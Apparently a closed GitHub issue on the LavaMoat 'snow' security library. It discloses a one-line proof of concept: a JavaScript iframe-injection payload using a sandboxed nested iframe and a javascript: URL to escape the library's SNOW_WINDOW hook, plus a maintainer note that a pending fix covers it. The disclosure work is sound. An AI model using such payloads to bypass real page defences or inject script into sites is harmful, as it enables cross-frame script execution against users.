Closed mmndaniel closed 1 year ago
var d = document.createElement('div'); document.body.appendChild(d); d.innerHTML = `<iframe srcdoc="<iframe sandbox='allow-same-origin' src='javascript:alert(1)'></iframe><script>frames[0].alert.call(top, 1);</script>" </iframe>`;
Same idea as https://github.com/LavaMoat/snow/issues/90, just using sandbox to break the internal SNOW_WINDOW call :)
SNOW_WINDOW
seems like #101 will fix this issue as well as #93
Same idea as https://github.com/LavaMoat/snow/issues/90, just using sandbox to break the internal
SNOW_WINDOW
call :)